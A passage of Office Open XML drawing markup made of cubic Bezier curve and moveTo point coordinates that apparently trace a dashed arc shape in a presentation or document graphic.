                  <a:cubicBezTo>
                    <a:pt x="1778" y="272"/>
                    <a:pt x="1778" y="270"/>
                    <a:pt x="1776" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1771" y="264"/>
                    <a:pt x="1766" y="260"/>
                    <a:pt x="1761" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1759" y="254"/>
                    <a:pt x="1757" y="254"/>
                    <a:pt x="1756" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1754" y="257"/>
                    <a:pt x="1754" y="260"/>
                    <a:pt x="1756" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1756" y="261"/>
                    <a:pt x="1756" y="261"/>
                    <a:pt x="1756" y="261"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="236"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1730" y="240"/>
                    <a:pt x="1736" y="244"/>
                    <a:pt x="1741" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1742" y="250"/>
                    <a:pt x="1745" y="250"/>
                    <a:pt x="1746" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1748" y="246"/>
                    <a:pt x="1747" y="244"/>
                    <a:pt x="1746" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741" y="238"/>
                    <a:pt x="1735" y="234"/>
                    <a:pt x="1730" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1728" y="228"/>
                    <a:pt x="1726" y="229"/>
                    <a:pt x="1724" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1723" y="232"/>
                    <a:pt x="1723" y="235"/>
                    <a:pt x="1725" y="236"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1693" y="212"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="216"/>
                    <a:pt x="1704" y="220"/>
                    <a:pt x="1709" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1711" y="225"/>
                    <a:pt x="1714" y="225"/>
                    <a:pt x="1715" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1716" y="221"/>
                    <a:pt x="1716" y="219"/>
                    <a:pt x="1714" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1709" y="213"/>
                    <a:pt x="1703" y="209"/>
                    <a:pt x="1698" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1696" y="204"/>
                    <a:pt x="1694" y="204"/>
                    <a:pt x="1692" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1691" y="208"/>
                    <a:pt x="1692" y="211"/>
                    <a:pt x="1693" y="212"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1666" y="193"/>
                    <a:pt x="1672" y="196"/>
                    <a:pt x="1677" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1679" y="201"/>
                    <a:pt x="1681" y="201"/>
                    <a:pt x="1683" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1684" y="197"/>
                    <a:pt x="1683" y="195"/>
                    <a:pt x="1682" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676" y="190"/>
                    <a:pt x="1671" y="186"/>
                    <a:pt x="1665" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1663" y="181"/>
                    <a:pt x="1661" y="181"/>
                    <a:pt x="1660" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1658" y="185"/>
                    <a:pt x="1659" y="188"/>
                    <a:pt x="1661" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1661" y="189"/>
                    <a:pt x="1661" y="189"/>
                    <a:pt x="1661" y="189"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1627" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1633" y="171"/>
                    <a:pt x="1638" y="174"/>
                    <a:pt x="1644" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1646" y="179"/>
                    <a:pt x="1648" y="179"/>
                    <a:pt x="1649" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1651" y="175"/>
                    <a:pt x="1650" y="172"/>
                    <a:pt x="1648" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="168"/>
                    <a:pt x="1637" y="164"/>
                    <a:pt x="1631" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1629" y="159"/>
                    <a:pt x="1627" y="160"/>
                    <a:pt x="1626" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625" y="164"/>
                    <a:pt x="1625" y="166"/>
                    <a:pt x="1627" y="167"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="147"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1598" y="150"/>
                    <a:pt x="1604" y="153"/>
                    <a:pt x="1610" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1612" y="158"/>
                    <a:pt x="1614" y="157"/>
                    <a:pt x="1615" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="154"/>
                    <a:pt x="1616" y="151"/>
                    <a:pt x="1614" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1608" y="146"/>
                    <a:pt x="1602" y="143"/>
                    <a:pt x="1597" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1595" y="139"/>
                    <a:pt x="1592" y="139"/>
                    <a:pt x="1591" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1590" y="143"/>
                    <a:pt x="1591" y="146"/>
                    <a:pt x="1593" y="147"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1563" y="131"/>
                    <a:pt x="1569" y="134"/>
                    <a:pt x="1575" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1577" y="138"/>
                    <a:pt x="1580" y="137"/>
                    <a:pt x="1581" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1582" y="133"/>
                    <a:pt x="1581" y="131"/>
                    <a:pt x="1579" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1573" y="127"/>
                    <a:pt x="1567" y="124"/>
                    <a:pt x="1561" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1559" y="120"/>
                    <a:pt x="1557" y="120"/>
                    <a:pt x="1556" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1555" y="124"/>
                    <a:pt x="1556" y="127"/>
                    <a:pt x="1558" y="128"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1522" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="113"/>
                    <a:pt x="1534" y="116"/>
                    <a:pt x="1540" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1542" y="120"/>
                    <a:pt x="1544" y="119"/>
                    <a:pt x="1545" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1546" y="115"/>
                    <a:pt x="1545" y="112"/>
                    <a:pt x="1543" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1537" y="108"/>
                    <a:pt x="1531" y="105"/>
                    <a:pt x="1525" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1523" y="102"/>
                    <a:pt x="1521" y="103"/>
                    <a:pt x="1520" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1519" y="107"/>
                    <a:pt x="1520" y="109"/>
                    <a:pt x="1522" y="110"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1485" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1491" y="96"/>
                    <a:pt x="1498" y="99"/>
                    <a:pt x="1504" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1506" y="102"/>
                    <a:pt x="1508" y="101"/>
                    <a:pt x="1509" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1510" y="97"/>
                    <a:pt x="1509" y="95"/>
                    <a:pt x="1507" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501" y="91"/>
                    <a:pt x="1495" y="89"/>
                    <a:pt x="1488" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486" y="85"/>
                    <a:pt x="1484" y="86"/>
                    <a:pt x="1483" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1482" y="90"/>
                    <a:pt x="1483" y="93"/>
                    <a:pt x="1485" y="93"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1448" y="78"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1454" y="81"/>
                    <a:pt x="1461" y="83"/>
                    <a:pt x="1467" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="87"/>
                    <a:pt x="1471" y="86"/>
                    <a:pt x="1472" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473" y="81"/>
                    <a:pt x="1472" y="79"/>
                    <a:pt x="1470" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1464" y="76"/>
                    <a:pt x="1457" y="73"/>
                    <a:pt x="1451" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1449" y="70"/>
                    <a:pt x="1447" y="71"/>
                    <a:pt x="1446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1445" y="75"/>
                    <a:pt x="1446" y="78"/>
                    <a:pt x="1448" y="78"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1411" y="65"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="67"/>
                    <a:pt x="1423" y="69"/>
                    <a:pt x="1429" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1431" y="72"/>
                    <a:pt x="1434" y="71"/>
                    <a:pt x="1435" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1435" y="67"/>
                    <a:pt x="1434" y="65"/>
                    <a:pt x="1432" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1426" y="62"/>
                    <a:pt x="1419" y="59"/>
                    <a:pt x="1413" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1411" y="56"/>
                    <a:pt x="1409" y="58"/>
                    <a:pt x="1408" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1407" y="62"/>
                    <a:pt x="1408" y="64"/>
                    <a:pt x="1411" y="65"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1372" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1379" y="55"/>
                    <a:pt x="1385" y="56"/>
                    <a:pt x="1391" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1394" y="59"/>
                    <a:pt x="1396" y="58"/>
                    <a:pt x="1397" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1397" y="54"/>
                    <a:pt x="1396" y="52"/>
                    <a:pt x="1394" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="49"/>
                    <a:pt x="1381" y="47"/>
                    <a:pt x="1375" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1373" y="44"/>
                    <a:pt x="1370" y="46"/>
                    <a:pt x="1370" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1369" y="50"/>
                    <a:pt x="1370" y="52"/>
                    <a:pt x="1372" y="53"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1334" y="42"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="44"/>
                    <a:pt x="1347" y="45"/>
                    <a:pt x="1353" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1355" y="48"/>
                    <a:pt x="1358" y="46"/>
                    <a:pt x="1358" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1359" y="42"/>
                    <a:pt x="1358" y="40"/>
                    <a:pt x="1355" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1349" y="38"/>
                    <a:pt x="1342" y="36"/>
                    <a:pt x="1336" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1334" y="34"/>
                    <a:pt x="1332" y="35"/>
                    <a:pt x="1331" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1331" y="39"/>
                    <a:pt x="1332" y="41"/>
                    <a:pt x="1334" y="42"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1295" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="34"/>
                    <a:pt x="1308" y="36"/>
                    <a:pt x="1315" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1317" y="38"/>
                    <a:pt x="1319" y="36"/>
                    <a:pt x="1319" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1320" y="32"/>
                    <a:pt x="1319" y="30"/>
                    <a:pt x="1316" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1310" y="28"/>
                    <a:pt x="1303" y="26"/>
                    <a:pt x="1297" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1295" y="24"/>
                    <a:pt x="1293" y="26"/>
                    <a:pt x="1292" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1292" y="30"/>
                    <a:pt x="1293" y="32"/>
                    <a:pt x="1295" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1295" y="33"/>
                    <a:pt x="1295" y="33"/>
                    <a:pt x="1295" y="33"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1256" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1263" y="26"/>
                    <a:pt x="1269" y="27"/>
                    <a:pt x="1276" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1278" y="29"/>
                    <a:pt x="1280" y="28"/>
                    <a:pt x="1280" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="23"/>
                    <a:pt x="1279" y="21"/>
                    <a:pt x="1277" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="20"/>
                    <a:pt x="1264" y="18"/>
                    <a:pt x="1257" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1255" y="17"/>
                    <a:pt x="1253" y="18"/>
                    <a:pt x="1253" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1252" y="22"/>
                    <a:pt x="1254" y="25"/>
                    <a:pt x="1256" y="25"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1217" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1223" y="20"/>
                    <a:pt x="1230" y="21"/>
                    <a:pt x="1236" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1239" y="22"/>
                    <a:pt x="1241" y="21"/>
                    <a:pt x="1241" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1241" y="16"/>
                    <a:pt x="1240" y="14"/>
                    <a:pt x="1238" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1231" y="13"/>
                    <a:pt x="1224" y="12"/>
                    <a:pt x="1218" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1216" y="10"/>
                    <a:pt x="1213" y="12"/>
                    <a:pt x="1213" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1213" y="16"/>
                    <a:pt x="1214" y="18"/>
                    <a:pt x="1217" y="19"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1177" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1184" y="15"/>
                    <a:pt x="1190" y="15"/>
                    <a:pt x="1197" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1199" y="16"/>
                    <a:pt x="1201" y="15"/>
                    <a:pt x="1201" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="10"/>
                    <a:pt x="1200" y="8"/>
                    <a:pt x="1198" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="7"/>
                    <a:pt x="1184" y="7"/>
                    <a:pt x="1178" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1176" y="6"/>
                    <a:pt x="1174" y="7"/>
                    <a:pt x="1173" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1173" y="12"/>
                    <a:pt x="1175" y="14"/>
                    <a:pt x="1177" y="14"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1137" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="11"/>
                    <a:pt x="1150" y="12"/>
                    <a:pt x="1157" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1159" y="12"/>
                    <a:pt x="1161" y="11"/>
                    <a:pt x="1161" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1162" y="6"/>
                    <a:pt x="1160" y="4"/>
                    <a:pt x="1158" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1151" y="4"/>
                    <a:pt x="1144" y="3"/>
                    <a:pt x="1138" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1136" y="3"/>
                    <a:pt x="1134" y="4"/>
                    <a:pt x="1133" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1133" y="9"/>
                    <a:pt x="1135" y="11"/>
                    <a:pt x="1137" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1137" y="11"/>
                    <a:pt x="1137" y="11"/>
                    <a:pt x="1137" y="11"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1097" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="9"/>
                    <a:pt x="1111" y="9"/>
                    <a:pt x="1117" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1119" y="10"/>
                    <a:pt x="1121" y="8"/>
                    <a:pt x="1121" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1122" y="4"/>
                    <a:pt x="1120" y="2"/>
                    <a:pt x="1118" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1111" y="1"/>
                    <a:pt x="1104" y="1"/>
                    <a:pt x="1098" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1095" y="1"/>
                    <a:pt x="1094" y="3"/>
                    <a:pt x="1093" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1093" y="7"/>
                    <a:pt x="1095" y="9"/>
                    <a:pt x="1097" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1097" y="9"/>
                    <a:pt x="1097" y="9"/>
                    <a:pt x="1097" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1057" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061" y="8"/>
                    <a:pt x="1065" y="8"/>
                    <a:pt x="1069" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1072" y="8"/>
                    <a:pt x="1074" y="8"/>
                    <a:pt x="1077" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1080" y="9"/>
                    <a:pt x="1081" y="7"/>
                    <a:pt x="1081" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1081" y="2"/>
                    <a:pt x="1080" y="1"/>
                    <a:pt x="1077" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="0"/>
                    <a:pt x="1072" y="0"/>
                    <a:pt x="1069" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1065" y="0"/>
                    <a:pt x="1061" y="0"/>
                    <a:pt x="1057" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1055" y="1"/>
                    <a:pt x="1053" y="2"/>
                    <a:pt x="1053" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1053" y="7"/>
                    <a:pt x="1055" y="9"/>
                    <a:pt x="1057" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1018" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1024" y="9"/>
                    <a:pt x="1031" y="9"/>
                    <a:pt x="1038" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1040" y="9"/>
                    <a:pt x="1041" y="7"/>
                    <a:pt x="1041" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1041" y="3"/>
                    <a:pt x="1039" y="1"/>
                    <a:pt x="1037" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="1"/>
                    <a:pt x="1024" y="1"/>
                    <a:pt x="1017" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1015" y="2"/>
                    <a:pt x="1013" y="4"/>
                    <a:pt x="1013" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1013" y="8"/>
                    <a:pt x="1015" y="10"/>
                    <a:pt x="1018" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="978" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="984" y="12"/>
                    <a:pt x="991" y="11"/>
                    <a:pt x="998" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1000" y="11"/>
                    <a:pt x="1002" y="9"/>
                    <a:pt x="1001" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1001" y="4"/>
                    <a:pt x="999" y="3"/>
                    <a:pt x="997" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="990" y="3"/>
                    <a:pt x="984" y="4"/>
                    <a:pt x="977" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="5"/>
                    <a:pt x="973" y="6"/>
                    <a:pt x="973" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="974" y="11"/>
                    <a:pt x="976" y="12"/>
                    <a:pt x="978" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="938" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="945" y="16"/>
                    <a:pt x="951" y="15"/>
                    <a:pt x="958" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="960" y="14"/>
                    <a:pt x="962" y="12"/>
                    <a:pt x="961" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="961" y="8"/>
                    <a:pt x="959" y="6"/>
                    <a:pt x="957" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="950" y="7"/>
                    <a:pt x="944" y="8"/>
                    <a:pt x="937" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="9"/>
                    <a:pt x="933" y="11"/>
                    <a:pt x="934" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="15"/>
                    <a:pt x="936" y="17"/>
                    <a:pt x="938" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="899" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="905" y="21"/>
                    <a:pt x="912" y="20"/>
                    <a:pt x="918" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="920" y="19"/>
                    <a:pt x="922" y="17"/>
                    <a:pt x="922" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="921" y="12"/>
                    <a:pt x="919" y="11"/>
                    <a:pt x="917" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911" y="12"/>
                    <a:pt x="904" y="13"/>
                    <a:pt x="897" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="14"/>
                    <a:pt x="894" y="17"/>
                    <a:pt x="894" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="21"/>
                    <a:pt x="896" y="22"/>
                    <a:pt x="899" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="899" y="22"/>
                    <a:pt x="899" y="22"/>
                    <a:pt x="899" y="22"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="859" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="866" y="28"/>
                    <a:pt x="872" y="27"/>
                    <a:pt x="879" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="25"/>
                    <a:pt x="883" y="23"/>
                    <a:pt x="882" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="882" y="19"/>
                    <a:pt x="880" y="17"/>
                    <a:pt x="877" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="19"/>
                    <a:pt x="864" y="20"/>
                    <a:pt x="858" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="856" y="22"/>
                    <a:pt x="854" y="24"/>
                    <a:pt x="855" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="28"/>
                    <a:pt x="857" y="30"/>
                    <a:pt x="859" y="29"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="820" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="36"/>
                    <a:pt x="833" y="35"/>
                    <a:pt x="840" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="842" y="33"/>
                    <a:pt x="843" y="31"/>
                    <a:pt x="843" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="842" y="26"/>
                    <a:pt x="840" y="25"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831" y="27"/>
                    <a:pt x="825" y="28"/>
                    <a:pt x="818" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="30"/>
                    <a:pt x="815" y="33"/>
                    <a:pt x="816" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="37"/>
                    <a:pt x="818" y="38"/>
                    <a:pt x="820" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="820" y="38"/>
                    <a:pt x="820" y="38"/>
                    <a:pt x="820" y="38"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="782" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="46"/>
                    <a:pt x="795" y="44"/>
                    <a:pt x="801" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="803" y="42"/>
                    <a:pt x="804" y="40"/>
                    <a:pt x="804" y="38"/>
                  </a:cubicBezTo>
